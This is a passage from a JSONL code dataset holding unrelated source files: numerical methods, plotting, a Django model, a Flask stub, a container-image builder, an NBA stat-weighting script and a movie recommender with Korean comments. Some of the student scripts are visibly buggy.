1])\nax.set_xlabel('Latency (ms)')\nax.set_ylabel('Throughput (mb/s)')\nax.set_xlim((0, 30))\nax.set_ylim((0, 30))\n\nmu, sigma2 = estimate_gaussion(X)\np = np.zeros(X.shape)\np[:, 0] = stats.norm(mu[0], sigma2[0]).pdf(X[:, 0])\np[:, 1] = stats.norm(mu[1], sigma2[1]).pdf(X[:, 1])\n\npval = np.zeros(Xval.shape)\npval[:, 0] = stats.norm(mu[0], sigma2[0]).pdf(Xval[:, 0])\npval[:, 1] = stats.norm(mu[1], sigma2[1]).pdf(Xval[:, 1])\n\nepsilon, f1 = select_threshold(pval, yval)\noutliers = np.where(p < epsilon)\nfig, ax = plt.subplots(figsize=(12, 8))\nax.scatter(X[:, 0], X[:, 1])\nax.scatter(X[outliers[0], 0], X[outliers[0], 1], s=50, color='r', marker='o')\nax.set_xlabel('Latency (ms)')\nax.set_ylabel('Throughput (mb/s)')\nax.set_xlim((0, 30))\nax.set_ylim((0, 30))\n\n\nplt.show()\n","sub_path":"Machine Learning/Python/Anomaly Detection and Recommender Systems/anomaly.py","file_name":"anomaly.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553238957","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef f(x):\n\tif abs(x)<1 :\n\t\treturn 1\t\t\t#Defining box function\n\telse:\n\t\treturn 0\nfor i in range(3):\n\tN=int(input(\"Enter the value of N:\"))\t\t# user input N. The program takes three inputs and compute the result one after another.\n\tx_min=-50\n\tx_max=50\n\tx=np.linspace(x_min,x_max,N)\n\td=(x_max-x_min)/(N-1)\n\tfx,fk=[],[]\n\n\tfor i in range(N):\n\t\tfx.append(f(x[i]))\t\t\t# the box function array\n\n\tdft=np.fft.fft(fx,norm='ortho')\t\t\t#performing DFT\n\tk=2*np.pi*np.fft.fftfreq(N,d)\t\t\t#sampling k values\n\n\tfactor=np.exp(-1j*k*x_min)\n\n\tFT=d*np.sqrt(N/(2*np.pi))*factor*dft\t\t#Fourier transform\n\n\t#Plotting\n\tfig, ax= plt.subplots(1,2)\n\tfig.suptitle(\"p10:Fourier transform with sampling rate {:,.4f}\".format(d))\n\tax[0].plot(x,fx,'blue',label=\"box function\")\n\tax[0].set_xlabel(r'$x\\rightarrow$',fontsize=15)\n\tax[0].legend()\n\tax[0].set_ylabel(r'$f(x)\\rightarrow$',fontsize=15)\n\tax[1].plot(k,FT,'red',label=\"FT of box function\")\n\tax[1].set_xlabel(r'$k\\rightarrow$')\n\tax[1].set_ylabel(r'$\\tilde{f}(k)\\rightarrow$')\n\tax[1].legend()\n\tplt.show()\n\n\n\n\n\n","sub_path":"p10.py","file_name":"p10.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385328925","text":"\"\"\"Import Django models.\"\"\"\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .base import Base\nfrom .meal import Meal\nfrom ..fields import VISIBILITY_CHOICES\n\nFOOD_CHOICES = (\n (1, 'Soup'),\n (2, 'Main course'),\n)\n\n\nclass Food(Base):\n \"\"\"Stores food types.\"\"\"\n\n name = models.CharField(\n verbose_name=_(\"Name\"),\n help_text=_(\"eg. Fish and chips\"),\n max_length=127,\n )\n capacity = models.PositiveIntegerField(\n verbose_name=_(\"Capacity\"),\n default=None,\n null=True,\n blank=True,\n )\n meal = models.ForeignKey(\n Meal,\n verbose_name=_(\"Meal\"),\n )\n visibility = models.PositiveIntegerField(choices=VISIBILITY_CHOICES)\n\n def __str__(self):\n \"\"\"Return name as string representation.\"\"\"\n return self.name\n","sub_path":"api/models/food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"300440340","text":"print(\"CÂU 3: \")\nA = array([[-2,5,9],[7, 1, 1],[-3,7,-1] ])\nb = array([1, 6, -26])\nx0 = array([0,0,0])\ntol = 1e-6 \nnmax=50\neps = 1e-6\n\nprint(\"Phuong phap Jacobi:\")\ndef jacobi(A,b,nmax,tol):\n \n d = diag(A)\n N = diagflat(d) \n R = A-N\n G = - dot(inv(N),R)\n f = dot(inv(N),b)\n \n for n in range(50):\n x_j = dot(G,x0) + f;\n err = norm(dot(A,x_j)-b,1)\n if err < eps :\n print(\"x can tim: \",x_j)\n print(\"sai so: \",err)\n return x_j\n break\n return x_j\n\nx = jacobi(A,b,nmax,eps)\nprint(\"Nghiem la:\",x) \n\n \nprint(\"Phuong phap Gauss_Seidel:\")\ndef gauss_seidel(A,b,nmax,eps):\n \n N = tril(A) \n R = A - N\n G = - dot(inv(N),R)\n f = dot(inv(N),b)\n \n for n in range(100):\n x_gs = dot(G,x0) + f;\n err = norm(dot(A,x_gs)-b,1)\n if err < eps:\n print(\"x can tim: \",x_gs)\n print(\"sai so: \",err)\n return x_gs\n break\n return x_gs\n\nx = gauss_seidel(A,b,nmax,eps)\nprint(\"Nghiem la:\",x)\n\nfrom numpy import array, diag, diagflat,dot, tril\nfrom numpy.linalg import inv, norm\n\n \n","sub_path":"Bai Giua Ky/USB 2/chuchikien-17001515-01/Chuchikien-17001515- 01.py","file_name":"Chuchikien-17001515- 01.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116864566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDefault settings for GWH.\n\n\"\"\"\n\nfrom __future__ import unicode_literals\n\n__author__ = 'Kyle Martineau-McFarlane'\n\n\nsecret = 'insert unique high-entropy secret'\n\napplications = {\n 'my_site': [\n 'echo',\n 'Enter a command to run in settings.py',\n ]\n}\n","sub_path":"settings-example.py","file_name":"settings-example.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"94890677","text":"\"\"\"\nckwg +31\nCopyright 2015-2016 by Kitware, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n * Neither name of Kitware, Inc. nor the names of any contributors may be used\n to endorse or promote products derived from this software without specific\n prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR\nANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n==============================================================================\n\nVital Python Error handler class\n\n\"\"\"\n# -*- coding: utf-8 -*-\n\nimport ctypes\n\nfrom vital.util.VitalObject import VitalObject\nfrom vital.exceptions.base import VitalBaseException\n\n\n# noinspection PyPep8Naming\nclass VitalErrorHandle (VitalObject):\n \"\"\" Error handling structure used in C interface \"\"\"\n\n # noinspection PyPep8Naming\n class C_TYPE (ctypes.Structure):\n \"\"\"\n C Interface structure\n \"\"\"\n _fields_ = [\n (\"error_code\", ctypes.c_int),\n (\"message\", ctypes.c_char_p),\n ]\n\n C_TYPE_PTR = ctypes.POINTER(C_TYPE)\n\n def __init__(self):\n super(VitalErrorHandle, self).__init__()\n self._ec_exception_map = {}\n\n def _new(self):\n \"\"\"\n Create a new error handle instance.\n \"\"\"\n eh_new = self.VITAL_LIB['vital_eh_new']\n eh_new.restype = self.C_TYPE_PTR\n c_ptr = eh_new()\n if not c_ptr:\n raise RuntimeError(\"Failed construct new error handle instance\")\n return c_ptr\n\n def _destroy(self):\n eh_del = self.VITAL_LIB['vital_eh_destroy']\n eh_del.argtypes = [self.C_TYPE_PTR]\n eh_del(self._inst_ptr)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if exc_type is not None:\n return False\n else:\n self.propagate_exception()\n return True\n\n @property\n def error_code(self):\n return self.c_pointer[0].error_code\n\n @property\n def message(self):\n return self.c_pointer[0].message\n\n def set_exception_map(self, ec_exception_map):\n \"\"\"\n Extend the current return code to exception mapping.\n\n :param ec_exception_map: Dictionary mapping integer return code to an\n exception type, or function returning an exception instance, that\n should be raised. If a function is provided it should accept one\n positional argument that is the string message of the exception.\n :type ec_exception_map: dict[int, BaseException | types.FunctionType]\n\n \"\"\"\n self._ec_exception_map.update(ec_exception_map)\n\n def propagate_exception(self):\n \"\"\"\n Raise appropriate Python exception if our current error code is non-zero\n\n By default, if a non-zero error code is observed, a generic\n VitalBaseException is raised with the provided error handle message.\n\n If an exception map was set via set_exception_map(...) and the error\n code matches an entry, that will be raised instead.\n\n \"\"\"\n if self.error_code != 0:\n if self.error_code in self._ec_exception_map:\n raise self._ec_exception_map[self.error_code](self.message)\n else:\n raise VitalBaseException(self.message)\n","sub_path":"vital/bindings/python/vital/util/error_handle.py","file_name":"error_handle.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"626452544","text":"from __future__ import division\nfrom bs4 import BeautifulSoup\nfrom urllib2 import urlopen \nimport requests\nimport re \nimport random\nimport nbadata as data \nimport sys\nsys.setrecursionlimit(100000000) \n# THIS IS A PSEUDO-LEARNING ALGORITHM, IT TAKES IN N AMOUNT OF DATA AND RECURSIVELY\n# APPLIES DIFFERENT WEIGHTS TO EACH DATA POINT, UNTIL IT REACHES THE DESIRED OUTCOME (POINTSFOR/POINTSAGAINST)\n# THE WEIGHTS ARE ORDINAL, (1,2,3 ....N) \n\nerror = .0001\n\nteams = [\"atlanta\",\"boston\", \"brooklyn\",\"charlotte\",\"chicago\",\"cleveland\",\"dallas\",\"denver\",\"detroit\",\"goldenstate\",\"houston\",\"indiana\",\"laclippers\",\"lalakers\",\"memphis\",\"miami\",\"milwaukee\",\"minnesota\",\"neworleans\",\"newyork\",\"oklahomacity\",\"orlando\",\"philadelphia\",\"phoenix\",\"portland\",\"sacramento\",\"sanantonio\",\"toronto\",\"utah\",\"washington\"]\nstatsurl = \"http://www.nbastuffer.com/2015-2016_NBA_Regular_Season_Advanced_Stats.html\"\n# IMPORTS FUNCTION FROM NBADATA.PY TO SCRAPE WEBSITE ABOVE\n\ndef containsteamname(string,i=14):\n if (i< 0 or i > 28):\n return False\n elif (teams[i] in string):\n return True\n elif (string < teams[i]):\n return (containsteamname(string,i-1))\n elif (string > teams[i]):\n return (containsteamname(string,i+1))\n\n\n# def start(url,matches,teams,weights):\n# leaguedata = data.getdata(url)\n# i = 0\n# atlanta = \"atlanta\"\n# boston = \"boston\"\n# for team in leaguedata:\n# vars()['atlanta'] = team\n# print(atlanta)\n# init(dallas,philadelphia,dalvsphi,weights)\n\ndef getnextteam(count,games):\n if (nextteam > (len(games) -1)):\n return 0\n count += 1\n games = [[boston,houston,111/95,currentweights],[oklahomacity,memphis,114/122,currentweights],[atlanta,brooklyn,.977777,currentweights],[charlotte,newyork,94/102,currentweights],[minnesota,miami,103/91,currentweights]]\n\n\ndef normalize(team):\n i = 0\n for stat in team:\n if (stat > 50):\n stat = stat / 10\n team[i] = stat\n i += 1\n elif (stat <= 1):\n stat = stat * 10 \n team[i] = stat\n i += 1\n else: \n i+=1\n return team\n# DELETES STRING FROM TEAM1,TEAM2 AND NORMALIZES THE DATA \n# team1 = away \ndef init(team1,team2,outcome,weights):\n print(\"starting loop for \" + str(team1[0]) + \" and \" + str(team2[0]))\n length = len(team1)\n if (length != len(team2)):\n print(\"TEAM STATS ARE NOT THE SAME LENGTH!!\")\n\n # APPEND HOME = 1 , AWAY = 0\n team1[0] = 0\n team2[0] = 1\n\n team1 = [float(value) for value in team1]\n # team1 = [int(value) for value in team1]\n team2 = [float(value) for value in team2]\n team1[4] = 100 - team1[4]\n team1[8] = 100 - team1[8]\n team2[4] = 100 - team2[4]\n team2[8] = 100 - team2[8]\n\n team1 = normalize(team1)\n team2 = normalize(team2)\n\n return run(team1,team2,outcome,weights)\n\ndef run(team1,team2,outcome,weights): \n #APPLY WEIGHTS\n zip1 = zip(team1,weights) \n zip2 = zip(team2,weights)\n weightedstats1 = [elem[0] * elem[1] for elem in zip1]\n weightedstats2 = [elem[0] * elem[1] for elem in zip2]\n weightedstats1 = sum(weightedstats1)\n weightedstats2 = sum(weightedstats2)\n guess = weightedstats1/weightedstats2\n\n return compare(team1,team2,guess,outcome,weights)\n\nresults = []\n# ASSESS IF WEIGHTS ACHIEVED CORRECT OUTCOME\ndef compare (team1,team2,guess,outcome,weights):\n if (weights == currentweights):\n results = []\n if (abs(outcome - guess) < error):\n print(\"guess: \" + str(guess) + \" Correct = \" + str(outcome))\n print(\"order of weights\")\n print(weights)\n print(\"HOME GP PF PA DIFF POSS OEFF DEFF DIFF ODIFF RESTREN STREN CONS A4 WIN LOSS % PROJ PROJ2 ACH \")\n results += [weights]\n if (getnextteam() == 0):\n return results\n else:\n start = getnextteam()\n init(start[0],start[1],start[2],start[3])\n\n else:\n print(\"next recursion. Guess off by: \")\n print(abs(guess-outcome))\n return shuffle(team1,team2,outcome,weights,guess)\n\n# FIND WHICH STAT FAVORS THE TEAM THAT WAS UNDERVALUED IN THE GUESS AND INCREMENT IT BY ONE\ndef shuffle(team1,team2,outcome,weights,guess):\n # IF OUTCOME < GUESS: TEAM1 IS OVERVALUED IN GUESS\n if ((outcome - guess) < 0):\n diff = []\n maxvalue= 0\n weightindex = 0\n it = 0\n for i in range(len(team1)):\n diff += [team2[i] - team1[i]]\n for value in diff:\n if (value > maxvalue):\n maxvalue = value\n weightindex = it\n it += 1\n weights[weightindex] += 1\n return run(team1,team2,outcome,weights)\n else: \n diff = []\n maxvalue= 0\n weightindex = 0\n it = 0\n for i in range(len(team1)): \n diff += [(team1[i] - team2[i])]\n for value in diff:\n if (value > maxvalue):\n maxvalue = value\n weightindex = it\n it += 1\n weights[weightindex] += 1\n return run(team1,team2,outcome,weights)\n\n\n\n\ndef predictinit(team1,team2,avgweights):\n print(\"starting loop for \" + str(team1[0]) + \" and \" + str(team2[0]))\n length = len(team1)\n if (length != len(team2)):\n print(\"TEAM STATS ARE NOT THE SAME LENGTH!!\")\n\n # APPEND HOME = 1 , AWAY = 0\n team1[0] = 0\n team2[0] = 1\n # SHRINK HIGH VALUES, RAISE LOW VALUES\n\n team1 = [float(value) for value in team1]\n # team1 = [int(value) for value in team1]\n team2 = [float(value) for value in team2]\n team1 = normalize(team1)\n team2 = normalize(team2)\n return makeprediction(team1,team2,avgweights)\n\ndef makeprediction(team1,team2,avgweights):\n #APPLY WEIGHTS \n zip1 = zip(team1,avgweights) \n zip2 = zip(team2,avgweights)\n weightedstats1 = [elem[0] * elem[1] for elem in zip1]\n weightedstats2 = [elem[0] * elem[1] for elem in zip2]\n weightedstats1 = sum(weightedstats1)\n weightedstats2 = sum(weightedstats2)\n guess = weightedstats1/weightedstats2\n return guess \n\nbestweights = [15, 7, 3, 8, 17, 4, 11, 5, 14, 6, 19, 13, 18, 16, 10, 9, 12, 1, 2]\ncurrentweights = [15, 7, 3, 8, 17, 4, 11, 5, 14, 6, 19, 13, 18, 16, 10, 9, 12, 1, 2]\n\n\nweightseries = init(dallas,philadelphia, 92/86,currentweights)\n# avgweights = []\n# for i in range(len(currentweights)):\n# avg = (weights1[i] + weights2[i] + weights3[i] + weights4[i] + weights5[i] + weights6[i] + weights7[i]) / len(currentweights)\n# avgweights += [avg]\nprint(weightseries)\n\ngame = predictinit(charlotte,newyork,avgweights)\ngame4 = predictinit(cleveland,detroit,avgweights)\nprint(\"charlotte new york\" + str(game))\nprint(\"cleveland at detroit\" + str(game4))\n\n","sub_path":"web/nba/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"68813658","text":"from flask import Flask\nfrom flask import render_template\nimport json\nimport pymongo\n\napplication = Flask(__name__)\napplication.config.from_object('config') #Need to have a secret key for WTForms\n\n@application.route('/') #Simple page, serves up index with a WTForm\ndef index():\n\treturn render_template('index.html')\n\n#\n#@application.route('/tweets/', methods=['GET']) #Actually gets tweets - called asynchronously via jQuery\n#def get_tweets_from_handle(handle):\n#\tarray = Reader.tweet_array(handle)\n#\treturn json.dumps(array)\n\n@application.route('/songs/', methods=['GET']) #Gets the user some people to follow\ndef get_songs_from_handle(year):\n\tsongs = {'Something':'something else', '1':'2', 'year':year } \n\treturn json.dumps(songs)\n\nif __name__ == '__main__':\n\tapplication.debug = True\n\tapplication.run(host='0.0.0.0', debug=True)\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"8087394","text":"# Copyright 2017 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"A binary for constructing images from a source context.\"\"\"\n\nimport argparse\nimport sys\nimport tarfile\nfrom containerregistry.client import docker_creds\nfrom containerregistry.client import docker_name\nfrom containerregistry.client.v2_2 import append\nfrom containerregistry.client.v2_2 import docker_image\nfrom containerregistry.client.v2_2 import docker_session\nfrom containerregistry.client.v2_2 import save\nfrom containerregistry.tools import patched\nfrom containerregistry.transport import transport_pool\n\n\nimport httplib2\nimport logging\n\nfrom ftl.common import cache\nfrom ftl.common import context\n\nfrom ftl.node import builder\n\n_THREADS = 32\n_LEVEL_MAP = {\n \"NOTSET\": logging.NOTSET,\n \"DEBUG\": logging.DEBUG,\n \"INFO\": logging.INFO,\n \"WARNING\": logging.WARNING,\n \"ERROR\": logging.ERROR,\n \"CRITICAL\": logging.CRITICAL,\n}\n\nparser = argparse.ArgumentParser(\n description='Construct node images from source.')\n\nparser.add_argument(\n '--base',\n action='store',\n required=True,\n help=('The name of the docker base image.'))\n\nparser.add_argument(\n '--name',\n required=True,\n action='store',\n help=('The name of the docker image to push.'))\n\nparser.add_argument(\n '--directory',\n required=True,\n action='store',\n help='The path where the application data sits.')\n\nparser.add_argument(\n '--no-cache',\n dest='cache',\n action='store_false',\n help='Do not use cache during build.')\n\nparser.add_argument(\n '--cache',\n dest='cache',\n default=True,\n action='store_true',\n help='Use cache during build (default).')\n\nparser.add_argument(\n '--output-path',\n dest='output_path',\n action='store',\n help='Store final image as local tarball at output path \\\n instead of pushing to registry')\n\nparser.add_argument(\n \"-v\",\n \"--verbosity\",\n default=\"NOTSET\",\n nargs=\"?\",\n action='store',\n choices=_LEVEL_MAP.keys())\n\n\ndef main(args):\n args = parser.parse_args(args)\n logging.getLogger().setLevel(_LEVEL_MAP[args.verbosity])\n logging.basicConfig(\n format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d,%H:%M:%S')\n transport = transport_pool.Http(httplib2.Http, size=_THREADS)\n\n # TODO(mattmoor): Support digest base images.\n base_name = docker_name.Tag(args.base)\n base_creds = docker_creds.DefaultKeychain.Resolve(base_name)\n\n target_image = docker_name.Tag(args.name)\n target_creds = docker_creds.DefaultKeychain.Resolve(target_image)\n\n ctx = context.Workspace(args.directory)\n cash = cache.Registry(\n target_image.as_repository(),\n target_creds,\n transport,\n threads=_THREADS,\n mount=[base_name])\n bldr = builder.From(ctx)\n with docker_image.FromRegistry(base_name, base_creds,\n transport) as base_image:\n\n # Create (or pull from cache) the base image with the\n # package descriptor installation overlaid.\n logging.info('Generating dependency layer...')\n with bldr.CreatePackageBase(base_image, cash, args.cache) as deps:\n # Construct the application layer from the context.\n logging.info('Generating app layer...')\n app_layer, diff_id = bldr.BuildAppLayer()\n with append.Layer(deps, app_layer, diff_id=diff_id) as app_image:\n if args.output_path:\n with tarfile.open(name=args.output_path, mode='w') as tar:\n save.tarball(target_image, app_image, tar)\n logging.info(\"{0} tarball located at {1}\".format(\n str(target_image), args.output_path))\n return\n with docker_session.Push(\n target_image,\n target_creds,\n transport,\n threads=_THREADS,\n mount=[base_name]) as session:\n logging.info('Pushing final image...')\n session.upload(app_image)\n\n\nif __name__ == '__main__':\n with patched.Httplib2():\n main(sys.argv[1:])\n","sub_path":"ftl/node/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"393594075","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 29 14:22:09 2020\n\n@author: A\n\"\"\"\n#%%\n# 영화 추천 모델 (콘텐츠 기반의 필터링 )\n# 장르, 평점, 투표수 \nimport pandas as pd\nimport numpy as np\n\nmovies =pd.read_csv('tmdb_5000_movies.csv')\n\nmovies.info()\nmovies.head(1)\n#print(movies.shape)\n\n'''\n\t237000000\t[{\"id\": 28, \"name\": \"Action\"}, {\"id\": 12, \"nam...\thttp://www.avatarmovie.com/\t19995\t[{\"id\": 1463, \"name\": \"culture clash\"}, {\"id\":...\ten\tAvatar\tIn the 22nd century, a paraplegic Marine is di...\t150.437577\t[{\"name\": \"Ingenious Film Partners\", \"id\": 289...\t[{\"iso_3166_1\": \"US\", \"name\": \"United States o...\t2009-12-10\t2787965087\t162.0\t[{\"iso_639_1\": \"en\", \"name\": \"English\"}, {\"iso...\tReleased\tEnter the World of Pandora.\tAvatar\t7.2\t11800\n'''\nmovies_df = movies[['id','title', 'genres', 'vote_average', 'vote_count',\n 'popularity', 'keywords', 'overview']]\n\npd.set_option('max_colwidth', 500) # 행 넓이를 확장하여 콘솔창에 출력되는 정보를 확장합니다.\nmovies_df[['genres','keywords']][:1]\n\n\nfrom ast import literal_eval\n\nl='[{\"name\": \"Adventure\"}]'\ntype(l)\nlst= literal_eval(l) # literal_eval 무엇?\ntype(lst)\nlst[0]\n\nmovies_df['genres'] = movies_df['genres'].apply(literal_eval)\nmovies_df['keywords'] = movies_df['keywords'].apply(literal_eval)\n\n\n# x -> movies_df['genres'], \n# y -> {\"id\": 28, \"name\": \"Action\"}\nmovies_df['genres'] = movies_df['genres'].apply(lambda x : [ y['name'] for y in x]) # 영화 모든 장르명들을 저장합니다.\nmovies_df['keywords'] = movies_df['keywords'].apply(lambda x : [ y['name'] for y in x])\nmovies_df[['genres', 'keywords']][:1]\n\nfrom sklearn.feature_extraction.text import CountVectorizer\n# CountVectorizer를 적용하기 위해 공백문자로 word 단위가 구분되는 문자열로 변환. \nmovies_df['genres_literal'] = movies_df['genres'].apply(lambda x : (' ').join(x)) # 장르의 배열의 요소를 문자열로 묶습니다.\n# count_vect -> 장르명의 개수\ncount_vect = CountVectorizer(min_df=0, ngram_range=(1,2)) # 장르는 unique라서 min_df=0\ngenre_mat = count_vect.fit_transform(movies_df['genres_literal'])\nprint(genre_mat.toarray())\nprint(genre_mat.shape)\n\n# 각각의 영화마다 다른 모든 영화피처의 코사인 유사도 행렬 \nfrom sklearn.metrics.pairwise import cosine_similarity\ngenre_sim = cosine_similarity(genre_mat, genre_mat)\nprint(genre_sim.shape) # 모든영화와 비교 했으므로 shpae가 (4803, 4803)가 됩니다.\nprint(genre_sim[:2])\n\n# 정렬\n'''\ntest = [4, 1, 6, 19, 12, 39, 55, 13]\nnp.sort(test)[::-1] # np.sort(arr)[::-1]은 내리참순으로 정렬\n'''\n\ngenre_sim_sorted_ind = genre_sim.argsort()[:, ::-1] #genre_sim_sorted_ind: 장르가 유사한 영화의 인덱스 행렬, argosort()[;, ::-1]을 이용하면 유사도가 높은 순(내림 차순)으로 정리된 genre_sim 객체의 비교 행 위치 인덱스 값을 추출.\nprint(genre_sim_sorted_ind[:1])\n\ndef find_sim_movie(df, sorted_ind, title_name, top_n=10):\n \n # 인자로 입력된 movies_df DataFrame에서 'title' 컬럼이 입력된 title_name 값인 DataFrame추출\n title_movie = df[df['title'] == title_name]\n \n # title_named을 ���진 DataFrame의 index 객체를 ndarray로 반환하고 \n # sorted_ind 인자로 입력된 genre_sim_sorted_ind 객체에서 유사도 순으로 top_n 개의 index 추출\n title_index = title_movie.index.values\n similar_indexes = sorted_ind[title_index, :(top_n)]\n \n # 추출된 top_n index들 출력. top_n index는 2차원 데이터 임. \n # dataframe에서 index로 사용하기 위해서 1차원 array로 변경\n print(similar_indexes)\n similar_indexes = similar_indexes.reshape(-1)\n \n return df.iloc[similar_indexes]\n\n# 장르의 유사성은 있으나 추출된 영화 목록들이 대중성이 없다.\nsimilar_movies = find_sim_movie(movies_df, genre_sim_sorted_ind, 'The Godfather',10)\nsimilar_movies[['title', 'vote_average']]\n'''\n\ttitle\tvote_average\n2731\tThe Godfather: Part II\t8.3\n1243\tMean Streets\t7.2\n3636\tLight Sleeper\t5.7\n1946\tThe Bad Lieutenant: Port of Call - New Orleans\t6.0\n2640\tThings to Do in Denver When You're Dead\t6.7\n4065\tMi America\t0.0\n1847\tGoodFellas\t8.2\n4217\tKids\t6.8\n883\tCatch Me If You Can\t7.7\n3866\tCity of God\t8.1\n'''\n\n# 평점이 좋은 영화 10개 추천 - 점수는 높으나 vote_count가 낮기 때문에 객관성이 없다.\nmovies_df[['title','vote_average','vote_count']].sort_values('vote_average', ascending=False)[:10]\n'''\n\ntitle\tvote_average\tvote_count\n3519\tStiff Upper Lips\t10.0\t1\n4247\tMe You and Five Bucks\t10.0\t2\n4045\tDancer, Texas Pop. 81\t10.0\t1\n4662\tLittle Big Top\t10.0\t1\n3992\tSardaarji\t9.5\t2\n2386\tOne Man's Hero\t9.3\t2\n2970\tThere Goes My Baby\t8.5\t2\n1881\tThe Shawshank Redemption\t8.5\t8205\n2796\tThe Prisoner of Zenda\t8.4\t11\n3337\tThe Godfather\t8.4\t5893\n'''\n\n'''\n가중 평점(Weighted Rating) = (V/(V+M)) * R + (M/(V+M)) * C\nv: 개별 영화에 평점을 토표한 횟수\nm: 평점을 부여하기 위한 최소 투표 회수\nR: 개별 영화에 대한 평균 평점\nC: 전체 영화에 대한 평균 평점\n'''\n# 가중치가 부여된 평점 방식\nC = movies_df['vote_average'].mean() # 전체 영화의 평균 평점\nm = movies_df['vote_count'].quantile(0.6) # 투표 회수에 따른 가중치 높을 수록 투표 회수가 높은 영화에 더 많은 가중 평점을 부여 \nprint('C:',round(C,3), 'm:',round(m,3))\n\npercentile = 0.6\nm = movies_df['vote_count'].quantile(percentile)\nC = movies_df['vote_average'].mean()\n\ndef weighted_vote_average(record):\n v = record['vote_count']\n R = record['vote_average']\n \n return ( (v/(v+m)) * R ) + ( (m/(m+v)) * C ) \n\nmovies_df['weighted_vote'] = movies_df.apply(weighted_vote_average, axis=1) \n\n\nmovies_df[['title','vote_average','weighted_vote','vote_count']].sort_values('weighted_vote',\n ascending=False)[:10]\n\n'''\n\ttitle\tvote_average\tweighted_vote\tvote_count\n1881\tThe Shawshank Redemption\t8.5\t8.396052\t8205\n3337\tThe Godfather\t8.4\t8.263591\t5893\n662\tFight Club\t8.3\t8.216455\t9413\n3232\tPulp Fiction\t8.3\t8.207102\t8428\n65\tThe Dark Knight\t8.2\t8.136930\t12002\n1818\tSchindler's List\t8.3\t8.126069\t4329\n3865\tWhiplash\t8.3\t8.123248\t4254\n809\tForrest Gump\t8.2\t8.105954\t7927\n2294\tSpirited Away\t8.3\t8.105867\t3840\n2731\tThe Godfather: Part II\t8.3\t8.079586\t3338\n'''\n\ndef find_sim_movie(df, sorted_ind, title_name, top_n=10):\n title_movie = df[df['title'] == title_name] # 매개변수로 받은 제목과 같은 영화를 비교기준으로 선정\n title_index = title_movie.index.values # 선정된 영화의 인덱스를 가져옵니다.\n \n # top_n의 2배에 해당하는 쟝르 유사성이 높은 index 추출 \n similar_indexes = sorted_ind[title_index, :(top_n*2)] # 왜 2배?\n similar_indexes = similar_indexes.reshape(-1)\n # 기준 영화 index는 제외\n similar_indexes = similar_indexes[similar_indexes != title_index]\n \n # top_n의 2배에 해당하는 후보군에서 weighted_vote 높은 순으로 top_n 만큼 추출 \n return df.iloc[similar_indexes].sort_values('weighted_vote', ascending=False)[:top_n]\n\nsimilar_movies = find_sim_movie(movies_df, genre_sim_sorted_ind, 'The Godfather',10)\nsimilar_movies[['title', 'vote_average', 'weighted_vote']]\n\n'''\n\ttitle\tvote_average\tweighted_vote\n2731\tThe Godfather: Part II\t8.3\t8.079586\n1847\tGoodFellas\t8.2\t7.976937\n3866\tCity of God\t8.1\t7.759693\n1663\tOnce Upon a Time in America\t8.2\t7.657811\n883\tCatch Me If You 